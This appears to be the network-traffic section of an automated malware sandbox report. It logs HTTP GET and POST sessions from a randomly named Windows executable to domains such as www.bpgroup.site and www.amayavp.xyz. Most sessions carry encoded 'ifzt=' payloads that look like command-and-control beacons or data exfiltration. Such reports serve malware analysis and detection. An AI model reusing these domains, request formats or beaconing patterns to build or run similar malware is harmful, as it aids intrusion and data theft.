                                                                                                                                                Data Raw: 69 66 7a 74 3d 73 78 58 41 43 63 68 72 38 46 30 69 35 56 62 69 65 68 6e 4c 49 47 63 4f 67 54 53 56 79 66 75 67 41 71 48 6d 4c 30 6f 33 2f 68 73 65 39 45 2b 61 78 53 5a 57 78 54 6e 31 65 68 2b 7a 54 62 64 75 46 72 33 65 4b 57 6d 38 58 78 66 53 66 31 47 6a 49 46 32 5a 74 64 77 4d 68 73 47 6f 62 36 2f 73 72 43 61 4c 59 41 4b 52 52 74 6c 4c 48 44 73 6c 58 4d 4f 55 53 64 62 55 4d 6c 77 50 67 76 2f 35 56 66 52 59 37 64 47 63 64 6b 38 4d 72 4d 75 35 4f 58 45 4a 4f 4f 38 4e 62 31 57 46 42 69 79 37 58 78 42 59 70 52 6f 36 4a 6b 4f 46 37 54 65 42 66 62 54 4a 43 30 71 74 51 4e 62 7a 6c 6b 34 7a 43 47 71 31 55 53 6e 4c 46 7a 49 72 59 76 77 44 35 4e 59 76 6d 53 49 42 2f 39 39 79 6b 7a 39 64 64 4c 63 39 6c 52 75 46 6e 56 34 6d 32 51 66 6c 4a 59 38 51 49 50 57 69 58 6a 74 74 48 39 4e 72 35 56 58 50 48 37 2f 43 4b 33 41 48 4b 74 67 50 75 37 74 71 33 44 31 52 77 6c 32 4a 65 66 66 62 35 61 67 4a 37 54 74 45 42 56 6a 70 38 55 48 4c 52 77 74 61 44 39 4f 49 50 38 2f 76 74 31 4f 39 6a 54 73 50 56 4e 64 5a 5a 52 7a 61 33 [TRUNCATED]
                                                                                                                                                Data Ascii: ifzt=sxXACchr8F0i5VbiehnLIGcOgTSVyfugAqHmL0o3/hse9E+axSZWxTn1eh+zTbduFr3eKWm8XxfSf1GjIF2ZtdwMhsGob6/srCaLYAKRRtlLHDslXMOUSdbUMlwPgv/5VfRY7dGcdk8MrMu5OXEJOO8Nb1WFBiy7XxBYpRo6JkOF7TeBfbTJC0qtQNbzlk4zCGq1USnLFzIrYvwD5NYvmSIB/99ykz9ddLc9lRuFnV4m2QflJY8QIPWiXjttH9Nr5VXPH7/CK3AHKtgPu7tq3D1Rwl2Jeffb5agJ7TtEBVjp8UHLRwtaD9OIP8/vt1O9jTsPVNdZZRza30hSLiQe5HNjmso6Dy0yVU+es5gx6Q3FfoJ676/VFXLgJMHklTZMlmyPIHclHRBcbizrnySQPup7WTiZr8wUSnLc6LCbv2WNl+MylT+XyZNY551YGAvDGJcgrZ9Kapnzoqv3kx4TkPuGV98rZmi+9W9eMjMPeEyeLcZajLUboAtjVzaDXTtn7kbqbzgMipAE4qRCwEColCQMBY5YCCBWU+862aTxXQpVcF8anssPyky31nzpPqWuwdf40Aps6qe5bSWmR2CQeYH0dNKEF0QFfrWyP9kIKJUgsGKnw+H/xmfWVDSMmmXHQoqZRcgeBjiTg52HcbA2BKSgyHMLMzjZyKBkye8yDCyG9ZStFrMHJMua7FB3jEc/1xs+hD+sv4NoGZYOx4+weZrNa0u3JLVa/X7Ze1+ls8A2brBcPqqIyr9R2snp58mOpV46ecLrhvEuLylOLlWMY8YkwKjt9F/Ye4MTwQeQYtT2ghJHUY1e86ks0O8LhUPF0aGXE8ZN1aDFfjSaBGaxB2+7yam5cpdBYjwUxxW+575w6bdvl2K+ON2dk5Jwj8iix34ov37rE3p9UMEd5EkNtOAnhEOv6OgJ0Y3KLrA5PPMaCBU91a9dn9A2G0kdLTnPkkHpaG0G3wNz3olM1sEVtRbz79Zt0Grgjx6i7tunTGYXex2 [TRUNCATED]
                                                                                                                                                Nov 25, 2024 09:42:53.318517923 CET683INHTTP/1.1 200 OK
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 25 Nov 2024 08:42:53 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Encoding: br
                                                                                                                                                Data Raw: 31 62 39 0d 0a a1 f0 19 00 20 97 3a 9d 56 9d 4a d6 59 36 4b b1 e2 bc 4b 3c 35 5b f1 45 41 2c 0d 9c 13 75 a2 53 8d 6c f0 cd 92 13 07 3c e1 f2 a8 9b 1d ec a0 b7 b9 66 cf fe 04 a9 07 c7 dc 1a 81 74 49 60 9a 4e 0f b5 1a 01 fc a4 a2 3d c3 64 82 6e 15 0f 57 94 34 9d e4 c6 4c f9 66 2e 65 3d c3 c8 59 05 16 e0 94 83 d7 f7 da fa 21 93 04 71 cc 92 1e 37 82 54 19 e7 0e 1c 96 b4 e5 99 64 ec 1f e2 be fb 9f 22 71 e7 f6 01 fb 85 6b c5 c2 eb 3b b7 90 01 ec 1a 4d eb fa f1 b1 14 8a fe d2 df d3 bf 98 2d 01 ce 97 4b fc 3e d5 e1 db 82 79 ee 80 52 ee 21 ad 7d c7 be 6f 7b ed c3 90 b9 10 82 4c 36 f6 d5 bf 9f d2 94 b6 29 65 e1 c5 c5 04 1a 04 99 5c 76 d9 1b 12 fb 5f 6f 0f 01 a0 ff a0 5e 0a a1 51 d9 54 61 96 e5 b6 54 b2 32 b2 10 2d 65 b5 50 a9 2e 29 e3 da e6 b5 aa 8a b2 34 b9 73 ae 92 a6 50 aa ac 54 2a 54 2e 2a a1 4b e5 ab 74 80 cc e3 54 5a 83 5a f8 4a 95 b9 13 68 4a 34 69 2a 64 89 ca 3b 54 da 8f b8 b6 33 b3 6d f4 04 30 05 f4 f3 73 ed 56 6b a0 21 d2 10 c1 ce 9f 5f bf c4 d6 99 e5 f7 7c 1d 18 9e 73 e4 9a b1 90 d6 24 32 3f 84 6e [TRUNCATED]
                                                                                                                                                Data Ascii: 1b9 :VJY6KK<5[EA,uSl<ftI`N=dnW4Lf.e=Y!q7Td"qk;M-K>yR!}o{L6)e\v_o^QTaT2-eP.)4sPT*T.*KtTZZJhJ4i*d;T3m0sVk!_|s$2?nIEWDEE[[up'yID+t}Ps_(eGQIKL#J-f"WeJrF$|0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                4192.168.2.449745185.27.134.144803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:42:54.690721989 CET515OUTGET /572a/?ifzt=hz/gBsBCliEB3liRCjDcUFpXpjm75vqUHY7uUC9CoicjvHiRwDII6Rr7fwqPQOBPL5PXCDqoRSfvUw6rLDaKlN9Kt5+gU7jSjDaWWRyTQ8pSIxkDCsHDSL4=&qX=qP0hoZO0bjg4 HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.amayavp.xyz
                                                                                                                                                Connection: close
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Nov 25, 2024 09:42:56.021442890 CET1174INHTTP/1.1 200 OK
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 25 Nov 2024 08:42:55 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 973
                                                                                                                                                Connection: close
                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 65 73 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 74 6f 4e 75 6d 62 65 72 73 28 64 29 7b 76 61 72 20 65 3d 5b 5d 3b 64 2e 72 65 70 6c 61 63 65 28 2f 28 2e 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 65 2e 70 75 73 68 28 70 61 72 73 65 49 6e 74 28 64 2c 31 36 29 29 7d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 74 6f 48 65 78 28 29 7b 66 6f 72 28 76 61 72 20 64 3d 5b 5d 2c 64 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 41 72 72 61 79 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 61 72 67 75 6d 65 6e 74 73 2c 65 3d 22 22 2c 66 3d 30 3b 66 3c 64 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 65 2b 3d 28 31 36 3e 64 5b 66 5d 3f 22 30 22 3a 22 22 29 2b 64 5b 66 5d 2e 74 6f 53 74 72 69 6e 67 28 31 36 [TRUNCATED]
                                                                                                                                                Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("06dcab5f8942e5ac4ac00564a9fea9bf");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.amayavp.xyz/572a/?ifzt=hz/gBsBCliEB3liRCjDcUFpXpjm75vqUHY7uUC9CoicjvHiRwDII6Rr7fwqPQOBPL5PXCDqoRSfvUw6rLDaKlN9Kt5+gU7jSjDaWWRyTQ8pSIxkDCsHDSL4=&qX=qP0hoZO0bjg4&i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                5192.168.2.44975374.48.143.82803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:43:02.232209921 CET780OUTPOST /ykn4/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.bpgroup.site
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 201
                                                                                                                                                Origin: http://www.bpgroup.site
                                                                                                                                                Referer: http://www.bpgroup.site/ykn4/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Raw: 69 66 7a 74 3d 2f 42 61 31 44 30 47 50 73 7a 5a 56 4f 69 41 5a 43 43 37 41 4d 6d 6f 66 45 30 41 5a 35 67 37 2b 36 34 45 66 4b 68 4d 6c 79 31 77 41 34 44 62 36 50 6e 57 57 7a 32 74 41 76 56 6d 52 51 4e 57 48 4b 4e 4b 62 45 74 38 78 6f 55 49 72 64 35 68 6a 78 48 76 4c 63 6d 39 4c 50 63 59 72 6b 68 30 74 45 55 48 51 4c 55 48 45 79 4a 72 54 61 53 43 4d 36 38 43 53 55 2f 6e 58 68 51 30 79 6a 68 6f 64 64 6e 57 38 56 77 41 52 6d 6a 7a 4c 6c 51 78 73 66 61 37 50 7a 51 6a 5a 6d 47 64 45 35 30 37 63 31 50 72 76 4b 4a 59 46 35 39 6e 4e 6f 4f 4c 65 68 58 4b 4b 56 75 55 44 6b 58 47 32 71 75 44 43 35 77 3d 3d
                                                                                                                                                Data Ascii: ifzt=/Ba1D0GPszZVOiAZCC7AMmofE0AZ5g7+64EfKhMly1wA4Db6PnWWz2tAvVmRQNWHKNKbEt8xoUIrd5hjxHvLcm9LPcYrkh0tEUHQLUHEyJrTaSCM68CSU/nXhQ0yjhoddnW8VwARmjzLlQxsfa7PzQjZmGdE507c1PrvKJYF59nNoOLehXKKVuUDkXG2quDC5w==
                                                                                                                                                Nov 25, 2024 09:43:03.384166956 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                Connection: close
                                                                                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                pragma: no-cache
                                                                                                                                                content-type: text/html
                                                                                                                                                content-length: 1251
                                                                                                                                                date: Mon, 25 Nov 2024 08:43:04 GMT
                                                                                                                                                server: LiteSpeed
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                                                                                                Nov 25, 2024 09:43:03.384260893 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                                                                                                                Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                6192.168.2.44975974.48.143.82803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:43:04.897916079 CET800OUTPOST /ykn4/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.bpgroup.site
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 221
                                                                                                                                                Origin: http://www.bpgroup.site
                                                                                                                                                Referer: http://www.bpgroup.site/ykn4/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Raw: 69 66 7a 74 3d 2f 42 61 31 44 30 47 50 73 7a 5a 56 4d 43 51 5a 45 68 6a 41 4e 47 6f 65 4c 55 41 5a 6a 51 37 41 36 34 41 66 4b 67 49 31 79 41 41 41 35 6d 33 36 64 7a 43 57 39 57 74 41 67 31 6d 65 4e 64 57 32 4b 4e 32 70 45 76 6f 78 6f 58 30 72 64 34 52 6a 79 30 48 49 64 32 39 4e 58 73 59 31 37 52 30 74 45 55 48 51 4c 55 6a 75 79 49 44 54 61 68 4b 4d 6f 4e 43 52 58 2f 6e 57 32 67 30 79 6e 68 6f 5a 64 6e 57 65 56 78 63 33 6d 68 62 4c 6c 52 42 73 66 76 61 39 6d 41 69 53 69 47 63 52 38 31 47 31 79 75 57 61 43 72 49 58 78 70 58 67 70 49 47 45 77 6d 72 64 48 75 77 77 35 51 50 43 6e 74 2b 4c 69 7a 5a 62 45 63 38 36 54 4b 31 5a 77 76 39 75 4b 54 65 6e 54 6c 30 3d
                                                                                                                                                Data Ascii: ifzt=/Ba1D0GPszZVMCQZEhjANGoeLUAZjQ7A64AfKgI1yAAA5m36dzCW9WtAg1meNdW2KN2pEvoxoX0rd4Rjy0HId29NXsY17R0tEUHQLUjuyIDTahKMoNCRX/nW2g0ynhoZdnWeVxc3mhbLlRBsfva9mAiSiGcR81G1yuWaCrIXxpXgpIGEwmrdHuww5QPCnt+LizZbEc86TK1Zwv9uKTenTl0=
                                                                                                                                                Nov 25, 2024 09:43:06.154476881 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                Connection: close
                                                                                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                pragma: no-cache
                                                                                                                                                content-type: text/html
                                                                                                                                                content-length: 1251
                                                                                                                                                date: Mon, 25 Nov 2024 08:43:06 GMT
                                                                                                                                                server: LiteSpeed
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                                                                                                Nov 25, 2024 09:43:06.154603958 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                                                                                                                Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                7192.168.2.44976674.48.143.82803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:43:07.554625988 CET10882OUTPOST /ykn4/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.bpgroup.site
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 10301
                                                                                                                                                Origin: http://www.bpgroup.site
                                                                                                                                                Referer: http://www.bpgroup.site/ykn4/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Raw: 69 66 7a 74 3d 2f 42 61 31 44 30 47 50 73 7a 5a 56 4d 43 51 5a 45 68 6a 41 4e 47 6f 65 4c 55 41 5a 6a 51 37 41 36 34 41 66 4b 67 49 31 79 41 49 41 35 55 2f 36 50 43 43 57 38 57 74 41 74 56 6d 64 4e 64 57 52 4b 4e 76 69 45 76 6c 45 6f 52 34 72 50 4c 4a 6a 33 46 48 49 55 32 39 4e 4c 63 59 6f 6b 68 31 31 45 55 58 55 4c 55 7a 75 79 49 44 54 61 67 61 4d 72 63 43 52 52 2f 6e 58 68 51 30 6d 6a 68 6f 39 64 6e 4f 6b 56 79 77 42 36 42 37 4c 6d 78 52 73 59 4c 36 39 37 77 69 51 76 6d 64 53 38 31 4b 75 79 76 37 6c 43 71 4d 35 78 75 6e 67 72 63 50 4c 68 33 58 6e 5a 2f 6f 31 68 6e 36 6f 2b 64 6d 46 71 55 46 68 44 73 74 75 41 37 6c 78 30 6f 45 69 50 42 43 6c 45 51 2b 78 6a 50 6d 57 6c 79 62 41 44 52 4b 6f 43 37 65 30 4d 72 68 4c 45 51 6c 35 57 44 58 39 2b 7a 57 36 34 66 75 59 59 4d 46 44 39 45 77 56 76 34 55 38 31 55 46 53 42 43 77 6b 6d 69 46 79 37 43 57 45 59 69 64 66 34 49 2b 2f 6b 41 57 68 38 2b 64 4b 52 74 5a 6f 56 57 4e 4f 47 35 61 74 36 50 4a 7a 6e 59 43 42 4f 42 55 54 61 43 4b 5a 43 4e 43 61 32 56 68 75 4b [TRUNCATED]
                                                                                                                                                Data Ascii: ifzt=/Ba1D0GPszZVMCQZEhjANGoeLUAZjQ7A64AfKgI1yAIA5U/6PCCW8WtAtVmdNdWRKNviEvlEoR4rPLJj3FHIU29NLcYokh11EUXULUzuyIDTagaMrcCRR/nXhQ0mjho9dnOkVywB6B7LmxRsYL697wiQvmdS81Kuyv7lCqM5xungrcPLh3XnZ/o1hn6o+dmFqUFhDstuA7lx0oEiPBClEQ+xjPmWlybADRKoC7e0MrhLEQl5WDX9+zW64fuYYMFD9EwVv4U81UFSBCwkmiFy7CWEYidf4I+/kAWh8+dKRtZoVWNOG5at6PJznYCBOBUTaCKZCNCa2VhuKTR6N25ERS576aSWRgCJz+ndQv/l6TryvTGaA8ywfvG8L6oZx6yN5O8duw3MPlqlNmCqHNDsje+7ML3uzRrzem9Ex/HMpcvonayzpwdPHFPAFVXROFiUvKqDoOfCZZmS8WtZiAWmHoV+V/R74/nsExpUjsDMbok8kOeYZ9KjtKma80Zb9X0oASJf97VP+PFYI+2jF7gvFZ/UDWK2p2gowi1ud+lvOtK7z790TWvu8atm0y90ALEIrMz1XdBa6t4wl3pOk3GQBOkxJwPNbn1bt0C0yUFLwrx9OB6cDyt1E3Gk6/rwRs86CjzAowfcnCTVfHAQ6vIsNYeUEvEaL900iooDS3opCspg2fnbjnZZibKlESmyl6+sl9fnpd+wA6sWip2bmc59NzY4tfoDeUxXQh4Mzu9ZGim3rcotM+eblB9EDUdiuZb38j8vBk8DtKVEmAzmSb4BZcKNTrKO0lqxq29WxS9xhuYhJoIuteG7iLxwjtAg2e+bA6Z4oHUJ+zXd1x9fNcx4bijsJt90OB53tJJoUCeJU5P/ATmbIOozA6jZabP8J7ZBSl95VnAuymy+1VZZjUjItgu7/regc+8iPby4SxdcweMI28Vt0WwxBNBt2qZk3bB1qCRn51143CX+BqCYJuxb8ztqMMus90Se97S389IGQdbLZUX [TRUNCATED]


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                8192.168.2.44977674.48.143.82803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:43:10.226810932 CET516OUTGET /ykn4/?qX=qP0hoZO0bjg4&ifzt=yDyVABeQ4Ct1InZ0OhfmdnBFKWQ7rCX+/8YxCwFx8D5ixU3VRgnj+l5ygnfgEeC3H+CzN484nEASY7Na52DMVUZTGbosqxUoBmbbT2616qreZhvQ7f+FXOQ= HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.bpgroup.site
                                                                                                                                                Connection: close
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Nov 25, 2024 09:43:11.526035070 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                Connection: close
                                                                                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                pragma: no-cache
                                                                                                                                                content-type: text/html
                                                                                                                                                content-length: 1251
                                                                                                                                                date: Mon, 25 Nov 2024 08:43:12 GMT
                                                                                                                                                server: LiteSpeed
